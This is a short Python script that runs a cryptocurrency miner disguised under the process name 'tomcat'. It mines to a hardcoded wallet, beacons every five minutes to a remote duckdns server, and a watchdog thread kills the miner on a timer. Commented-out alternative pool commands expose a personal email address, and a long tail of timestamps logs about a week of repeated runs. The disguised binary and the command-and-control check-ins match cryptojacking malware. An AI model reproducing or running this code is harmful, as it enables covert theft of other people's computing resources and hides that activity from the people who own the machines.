import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:50:08.444111
#2018-02-17 16:31:04.238932
#2018-02-17 18:19:05.904603
#2018-02-17 20:07:01.710949
#2018-02-17 21:54:06.014534
#2018-02-17 23:39:05.444224
#2018-02-18 01:28:06.724025
#2018-02-18 03:15:06.295684
#2018-02-18 05:03:06.323228
#2018-02-18 06:54:04.826689
#2018-02-18 08:44:03.938591
#2018-02-18 10:31:04.418557
#2018-02-18 12:16:03.913418
#2018-02-18 14:03:01.832587
#2018-02-18 15:52:07.167657
#2018-02-18 17:42:07.917590
#2018-02-18 19:29:04.697122
#2018-02-18 21:14:04.830495
#2018-02-18 23:01:05.847355
#2018-02-19 00:48:06.697356
#2018-02-19 02:35:07.075678
#2018-02-19 04:21:01.732029
#2018-02-19 06:06:06.714387
#2018-02-19 07:56:04.078265
#2018-02-19 09:47:04.338324
#2018-02-19 11:35:10.291154
#2018-02-19 13:22:06.998909
#2018-02-19 15:10:02.650471
#2018-02-19 16:59:01.713209
#2018-02-19 18:46:08.552939
#2018-02-19 20:35:06.646866
#2018-02-19 22:21:05.943427
#2018-02-20 00:07:06.184667
#2018-02-20 01:53:01.732389
#2018-02-20 03:44:05.720526
#2018-02-20 05:29:07.500461
#2018-02-20 07:14:01.592314
#2018-02-20 08:59:05.844687
#2018-02-20 10:43:06.303639
#2018-02-20 12:29:01.876861
#2018-02-20 14:16:01.410286
#2018-02-20 16:01:08.175330
#2018-02-20 17:48:06.135527
#2018-02-20 19:39:07.307006
#2018-02-20 21:27:03.992411
#2018-02-20 23:09:07.567870
#2018-02-21 00:53:07.916841
#2018-02-21 02:38:03.847171
#2018-02-21 04:27:06.204233
#2018-02-21 06:15:04.148457
#2018-02-21 08:01:12.446489
#2018-02-21 09:46:06.156179
#2018-02-21 11:34:08.182794
#2018-02-21 13:23:07.715448
#2018-02-21 15:07:03.944950
#2018-02-21 16:56:05.784615
#2018-02-21 18:44:05.850451
#2018-02-21 20:32:01.896826
#2018-02-21 22:18:04.490145
#2018-02-22 00:07:09.107277
#2018-02-22 01:55:04.031546
#2018-02-22 03:42:06.633031
#2018-02-22 05:29:05.037171
#2018-02-22 07:14:07.217730
#2018-02-22 09:02:06.830354
#2018-02-22 10:49:04.997433
#2018-02-22 12:35:08.958827
#2018-02-22 14:20:12.293400
#2018-02-22 16:08:06.681088
#2018-02-22 17:53:09.696290
#2018-02-22 19:42:06.202885
#2018-02-22 21:32:08.670269
#2018-02-22 23:19:08.132398
#2018-02-23 01:07:01.435627
#2018-02-23 02:53:01.988225
#2018-02-23 04:42:07.607683
#2018-02-23 06:29:05.763263
#2018-02-23 08:16:05.843025
#2018-02-23 10:32:06.102680
#2018-02-23 12:24:06.036956
#2018-02-23 14:13:05.305932
#2018-02-23 16:05:03.231738
#2018-02-23 17:49:08.357915
#2018-02-23 19:36:08.268886
#2018-02-23 21:18:05.393730
#2018-02-23 23:07:05.004222
#2018-02-24 00:53:07.473450
#2018-02-24 02:49:01.593125
#2018-02-24 04:39:06.199978
#2018-02-24 06:23:05.580026
#2018-02-24 08:11:06.118567
#2018-02-24 09:55:08.304975
#2018-02-24 11:49:06.784833
#2018-02-24 13:41:06.170077
#2018-02-24 15:28:05.208179
#2018-02-24 17:17:07.875453
#2018-02-24 19:08:06.885236
#2018-02-24 20:56:06.373998
#2018-02-24 23:23:01.951849
#2018-02-25 02:47:06.181543
#2018-02-25 06:26:06.083884